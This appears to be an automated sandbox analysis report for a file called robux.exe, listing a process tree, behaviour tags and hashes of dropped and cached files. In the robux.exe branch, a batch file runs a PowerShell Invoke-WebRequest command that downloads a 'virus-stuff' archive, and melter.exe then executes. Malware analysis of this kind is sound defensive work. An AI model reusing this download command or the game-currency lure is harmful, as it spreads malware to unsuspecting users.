                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
                                                              2⤵
                                                                PID:6136
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
                                                                2⤵
                                                                  PID:3292
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
                                                                  2⤵
                                                                    PID:5424
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:1
                                                                    2⤵
                                                                      PID:6132
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6960 /prefetch:1
                                                                      2⤵
                                                                        PID:5280
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
                                                                        2⤵
                                                                          PID:4912
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
                                                                          2⤵
                                                                            PID:980
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:1
                                                                            2⤵
                                                                              PID:5756
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
                                                                              2⤵
                                                                                PID:5528
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2200 /prefetch:1
                                                                                2⤵
                                                                                  PID:912
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:1
                                                                                  2⤵
                                                                                    PID:1592
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
                                                                                    2⤵
                                                                                      PID:6060
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
                                                                                      2⤵
                                                                                        PID:1052
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:1
                                                                                        2⤵
                                                                                          PID:216
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
                                                                                          2⤵
                                                                                            PID:3836
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
                                                                                            2⤵
                                                                                              PID:2780
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
                                                                                              2⤵
                                                                                                PID:1888
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7000 /prefetch:1
                                                                                                2⤵
                                                                                                  PID:888
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7104 /prefetch:1
                                                                                                  2⤵
                                                                                                    PID:5532
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7700 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:2160
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7296 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4296
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7800 /prefetch:8
                                                                                                        2⤵
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:5304
                                                                                                      • C:\Users\Admin\Downloads\robux.exe
                                                                                                        "C:\Users\Admin\Downloads\robux.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:5864
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BFD2.tmp\BFD3.tmp\BFD4.bat C:\Users\Admin\Downloads\robux.exe"
                                                                                                          3⤵
                                                                                                            PID:1116
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
                                                                                                              4⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1616
                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                              timeout /t 10 /nobreak
                                                                                                              4⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:3472
                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                              timeout /t 20 /nobreak
                                                                                                              4⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:5924
                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:3296
                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:800
                                                                                                          • C:\Windows\system32\AUDIODG.EXE
                                                                                                            C:\Windows\system32\AUDIODG.EXE 0x51c 0x50c
                                                                                                            1⤵
                                                                                                              PID:5512
                                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                              1⤵
                                                                                                                PID:5268
                                                                                                              • C:\Users\Admin\Downloads\robux2\virus-stuff-main\melter.exe
                                                                                                                "C:\Users\Admin\Downloads\robux2\virus-stuff-main\melter.exe"
                                                                                                                1⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:4528

                                                                                                              Network

                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                                                                                                                Filesize

                                                                                                                471B

                                                                                                                MD5

                                                                                                                9ddbac445d0e3edfc1da1c9e0cc7049e

                                                                                                                SHA1

                                                                                                                7e978011ef7db7f0315e0a7c50c20ca8ed662b93

                                                                                                                SHA256

                                                                                                                6a624c5876030250829751c10462b7756b5454c93720e965ab5d2dc74ba19b1b

                                                                                                                SHA512

                                                                                                                8cfba09f317672789923ff836691ac216b15d8b002d62d0e888d7e88aa9106ca7a5d61ff80b4846f173c38fcc36d3a4de7c0c1864e23bef8abc08dbeabbe39e9

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_9A347AC5A42F886F9F966873087C7F2E

                                                                                                                Filesize

                                                                                                                727B

                                                                                                                MD5

                                                                                                                b5042aa3c56ca5dd7b8cbb948c51741b

                                                                                                                SHA1

                                                                                                                e517dba11085d407e54931f05de92e11892e287a

                                                                                                                SHA256

                                                                                                                a275820a5ec9a0eebf06b9800e0779025ec59133b299c183d5cbc4cad30a7034

                                                                                                                SHA512

                                                                                                                1d6d21e7a127b2d7f02214330075bd2ee9e22be31a013099e5116017febb5c2c024d8c69368e5b1512e363d7598106931673ec5eff6b59335d0c9bbe07b4612a

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                Filesize

                                                                                                                727B

                                                                                                                MD5

                                                                                                                6aa9da11b6262df5dd0d2da2dc4bb8c0

                                                                                                                SHA1

                                                                                                                9657def3d49acaed4bed3062dfcca99f1aad9358

                                                                                                                SHA256

                                                                                                                b53d7bd989cb7282e2ba6dde428724647625ba42d758bad35e345f1e73dadb0e

                                                                                                                SHA512

                                                                                                                0c09d3263d885b798c06d0bfba30cc44a63d0be607b0e4a92b9920a84ec61246d7da00047f4ab15a3871b4536709b3b66f1f9dc1b388148ba141df011e74da1c

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

                                                                                                                Filesize

                                                                                                                471B

                                                                                                                MD5

                                                                                                                598aa35a6694d4979644ab1b46841275

                                                                                                                SHA1

                                                                                                                496b6c6325a27759b3f1dc0cf33956bf6d45d04d

                                                                                                                SHA256

                                                                                                                32082e35143e182ba946c547a5b4135a69889c3dee1d6a64e4588f6c50324fb7

                                                                                                                SHA512

                                                                                                                34e81061d5446c6cffb6cf33043c9ad387c9aee0dd8678bfd703ed372cb2fbbb0ee3b5c329a7015d2c8ca76472d4fa322cbfa871ee68eafdaa0a23d3f0533d44

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                                                                                                                Filesize

                                                                                                                400B

                                                                                                                MD5

                                                                                                                35362c495704007f93b589cc8fde44a0

                                                                                                                SHA1

                                                                                                                e0cc2bf528a66d104df891664e44b9bbb2f1ec6c

                                                                                                                SHA256

                                                                                                                65850c6d15711d9fe8c0570053c7f64da9d775224557cee98500da83c4a8f192

                                                                                                                SHA512

                                                                                                                a7c7b03ad1365d9aa1f0b63082ec06e1f3fe6c028d127555344c3f87da74ecd237276db9b4e343f5a5eb647bfd6b99095b7f8d98db552bc0f7a4c70368fbd1bb

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_9A347AC5A42F886F9F966873087C7F2E

                                                                                                                Filesize

                                                                                                                404B

                                                                                                                MD5

                                                                                                                93eb868f4611f77a9ba7644f6b64264a

                                                                                                                SHA1

                                                                                                                4911d4d3aa0146a1909765ec3b347a508aa1936b

                                                                                                                SHA256

                                                                                                                f3ec2888b5d3afb2202a1c1ee69e7f6be8dfca31ece1eebc0abc5acb072b13f3

                                                                                                                SHA512

                                                                                                                1dc0fe7e260bcb49acdfb94c85b1ac8bcfd263bd971a421a26e96921eb969498719d12bdbf3b119b04d42ee3d6eebbaf9ca479a05dac706fdcc362eb93fdae13

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                Filesize

                                                                                                                412B

                                                                                                                MD5

                                                                                                                7bd75f6394b8c5997c89053ce57f8a82

                                                                                                                SHA1

                                                                                                                7edf421beacc8bc2e14e718922a9186cf4ebed7e

                                                                                                                SHA256

                                                                                                                1f6dc8576d5f10dbeba5fbdb6417af295bafd1c057878ba28aa436abdaa2beff

                                                                                                                SHA512

                                                                                                                4536bda7e56cdaf4e1b1437b97aaf467ae4c9ecb6ee6415c7ff4bbdeb2dfb21c94c07dce9033ca9b701f2abc5e6cffe31a6d85d1d2c7f8f1e14712819dedc9dd

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

                                                                                                                Filesize

                                                                                                                412B

                                                                                                                MD5

                                                                                                                322eb1e6535d44d81784719bc4cc8741

                                                                                                                SHA1

                                                                                                                4163fdf58a4f56d9bfee4f668fa148290b364c4c

                                                                                                                SHA256

                                                                                                                96ba2ae2d61d4e2f71ce3361c95e9cc309e8ead27eeec05a696a8bf73cc66517

                                                                                                                SHA512

                                                                                                                bb2b020538ba4a643564c45cb5a2066647f844d4dfc62a218d249021174225323fe3afe7351cd2b84ad40e01c906ee175e1bad628b2f9f4b870a3a7a86bb4355

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                9e3fc58a8fb86c93d19e1500b873ef6f

                                                                                                                SHA1

                                                                                                                c6aae5f4e26f5570db5e14bba8d5061867a33b56

                                                                                                                SHA256

                                                                                                                828f4eacac1c40b790fd70dbb6fa6ba03dcc681171d9b2a6579626d27837b1c4

                                                                                                                SHA512

                                                                                                                e5e245b56fa82075e060f468a3224cf2ef43f1b6d87f0351a2102d85c7c897e559be4caeaecfdc4059af29fdc674681b61229319dda95cb2ee649b2eb98d313e

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                27304926d60324abe74d7a4b571c35ea

                                                                                                                SHA1

                                                                                                                78b8f92fcaf4a09eaa786bbe33fd1b0222ef29c1

                                                                                                                SHA256

                                                                                                                7039ad5c2b40f4d97c8c2269f4942be13436d739b2e1f8feb7a0c9f9fdb931de

                                                                                                                SHA512

                                                                                                                f5b6181d3f432238c7365f64fc8a373299e23ba8178bcc419471916ef8b23e909787c7c0617ab22e4eb90909c02bd7b84f1386fbc61e2bdb5a0eb474175da4bd

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000032

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                MD5

                                                                                                                d6b36c7d4b06f140f860ddc91a4c659c

                                                                                                                SHA1

                                                                                                                ccf16571637b8d3e4c9423688c5bd06167bfb9e9

                                                                                                                SHA256

                                                                                                                34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

                                                                                                                SHA512

                                                                                                                2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000033

                                                                                                                Filesize

                                                                                                                67KB

                                                                                                                MD5

                                                                                                                929b1f88aa0b766609e4ca5b9770dc24

                                                                                                                SHA1

                                                                                                                c1f16f77e4f4aecc80dadd25ea15ed10936cc901

                                                                                                                SHA256

                                                                                                                965eaf004d31e79f7849b404d0b8827323f9fe75b05fe73b1226ccc4deea4074

                                                                                                                SHA512

                                                                                                                fe8d6b94d537ee9cae30de946886bf7893d3755c37dd1662baf1f61e04f47fa66e070210c990c4a956bde70380b7ce11c05ad39f9cbd3ea55b129bb1f573fa07

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000035

                                                                                                                Filesize

                                                                                                                41KB

                                                                                                                MD5

                                                                                                                58756d99d2376dcfbede6057dd25a745

                                                                                                                SHA1

                                                                                                                76f81b96664cd8863210bb03cc75012eaae96320

                                                                                                                SHA256

                                                                                                                f5d0da7b010b28a7fe2c314724a966c44068a8c8fa7e9a495e1284aa501067fa

                                                                                                                SHA512

                                                                                                                476e35c3da0cf223e773c2d26403c12f8c8d034273cca9e3c4cba9359f8506159c2a5267793c8bd9982b636191ddda62e9119593f5599053894c7027a58acc10

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000036

                                                                                                                Filesize

                                                                                                                19KB

                                                                                                                MD5

                                                                                                                76a3f1e9a452564e0f8dce6c0ee111e8

                                                                                                                SHA1

                                                                                                                11c3d925cbc1a52d53584fd8606f8f713aa59114

                                                                                                                SHA256

                                                                                                                381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c

                                                                                                                SHA512

                                                                                                                a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000037

                                                                                                                Filesize

                                                                                                                63KB

                                                                                                                MD5

                                                                                                                710d7637cc7e21b62fd3efe6aba1fd27

                                                                                                                SHA1

                                                                                                                8645d6b137064c7b38e10c736724e17787db6cf3

                                                                                                                SHA256

                                                                                                                c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b

                                                                                                                SHA512

                                                                                                                19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000038

                                                                                                                Filesize

                                                                                                                88KB

                                                                                                                MD5

                                                                                                                b38fbbd0b5c8e8b4452b33d6f85df7dc

                                                                                                                SHA1

                                                                                                                386ba241790252df01a6a028b3238de2f995a559

                                                                                                                SHA256

                                                                                                                b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

                                                                                                                SHA512

                                                                                                                546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003a

                                                                                                                Filesize

                                                                                                                1.2MB

                                                                                                                MD5

                                                                                                                ae3e1196fc70529c6e4e126165136f5a

                                                                                                                SHA1

                                                                                                                e482bffe480ac101e7eb97568d67dc8e8a401737

                                                                                                                SHA256

                                                                                                                2fd321b046ad5f14740e970694dbbb14f5c280e1bb3929c966f7231718e4aacd

                                                                                                                SHA512

                                                                                                                e14bed20f1891bb4c581cfbaa164f2e455e4ba798b17ccf8f81a8b3c563a702eb5f8f50525843963b600df3fa8b699155fe1ed9e1aacf16d8568f911e9bc787c

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003b

                                                                                                                Filesize

                                                                                                                43KB

                                                                                                                MD5

                                                                                                                d9b427d32109a7367b92e57dae471874

                                                                                                                SHA1

                                                                                                                ce04c8aeb6d89d0961f65b28a6f4a03381fc9c39

                                                                                                                SHA256

                                                                                                                9b02f8fe6810cacb76fbbcefdb708f590e22b1014dcae2732b43896a7ac060f3

                                                                                                                SHA512

                                                                                                                dcabc4223745b69039ea6a634b2c5922f0a603e5eeb339f42160adc41c33b74911bb5a3daa169cd01c197aeaca09c5e4a34e759b64f552d15f7a45816105fb07

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003c

                                                                                                                Filesize

                                                                                                                74KB

                                                                                                                MD5

                                                                                                                b07f576446fc2d6b9923828d656cadff

                                                                                                                SHA1

                                                                                                                35b2a39b66c3de60e7ec273bdf5e71a7c1f4b103

                                                                                                                SHA256

                                                                                                                d261915939a3b9c6e9b877d3a71a3783ed5504d3492ef3f64e0cb508fee59496

                                                                                                                SHA512

                                                                                                                7358cbb9ddd472a97240bd43e9cc4f659ff0f24bf7c2b39c608f8d4832da001a95e21764160c8c66efd107c55ff1666a48ecc1ad4a0d72f995c0301325e1b1df

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000041

                                                                                                                Filesize

                                                                                                                25KB

                                                                                                                MD5

                                                                                                                662a8eacbe2122448dac469755a70e37

                                                                                                                SHA1

                                                                                                                d921fb71699a405b09da754a733f672a54ab8bf2

                                                                                                                SHA256

                                                                                                                c8a9584f6a79694cf3f94984f89fc9c86ccbac676a563b821912b95b0ca578f8

                                                                                                                SHA512

                                                                                                                e53f54be9806e3b960e1697275b32c43679492fed694fcb6845f8bc301f5fc135e67473ebc2f6f49e7dd7509ec14a6485ddc6f538f8c76e7aaecafffcbb8776a

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000043

                                                                                                                Filesize

                                                                                                                19KB

                                                                                                                MD5

                                                                                                                d86af39bfad6a7cfc05e8ba5180af40b

                                                                                                                SHA1

                                                                                                                57e8adfdec058824b8b773c43d78c71c247c0002

                                                                                                                SHA256

                                                                                                                9c4ae99d75e4600840647a9549dc2b0004bf2576de44285555b5c2e1e122849a

                                                                                                                SHA512

                                                                                                                00f399d26abaafcd465eba1aec110a86974295eeeec3e547d24b48ec5f2b9c104b7617a842a37d8b18ab6c5ee26c37119df622490322ba0632a968fa0b98c203

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000077

                                                                                                                Filesize

                                                                                                                18KB

                                                                                                                MD5

                                                                                                                69c9b3764321f6066fd8158b77416ec7

                                                                                                                SHA1

                                                                                                                863559d38cb1513ff8c265bf27cfa862cac888ec

                                                                                                                SHA256

                                                                                                                99d8bb61f21823c0a4d8468330a82fcbb7cb3b8f7b02fc95c326a33e122a2f80

                                                                                                                SHA512

                                                                                                                5bb7b93cac20482acb8e54bf8986a309aeeeaefb698701e84bb61a961f25fa67ba1d930f3c49f810090c4cce356e81b34026c8e051b49267be8999d1f73e976c

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                Filesize

                                                                                                                1KB

                                                                                                                MD5

                                                                                                                ce7c91358cdf0ad714d3bd65bd69e9b8

                                                                                                                SHA1

                                                                                                                d770bfb5e76705265d3ce2010d72b4513256e72d

                                                                                                                SHA256

                                                                                                                9f33414d36f2e685cd398f6271d0dec40654bb2215b3041e4c7a3c4ef2ce4e9a

                                                                                                                SHA512

                                                                                                                47b9f976ebc6816ad12a3869243a746e534ea59ebebdbca898c4c1dd4a04fc02a9076c76948117fc6d90798543549a46589c9f1ee4f42d0e09df0115f04befa3

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                Filesize

                                                                                                                6KB

                                                                                                                MD5

                                                                                                                2bafa7647f39c1d3ad3f7c5cc75235ef

                                                                                                                SHA1

                                                                                                                a99486257ce9d9ebfa0cde47185d3c5289dc3afc

                                                                                                                SHA256

                                                                                                                5a8a0f6209e9ac69a3b8ae400c9faa0e61f1fba14318a997bf0d1b5c8a72ef08

                                                                                                                SHA512

                                                                                                                9517b1f3706c55ca9282255a3b95e96d366c0ac1073ea33c2e2e4a784b28e824144f4ce2c8749e4d5b937091fcd269896db42316f12fefdebf07e060a567a672

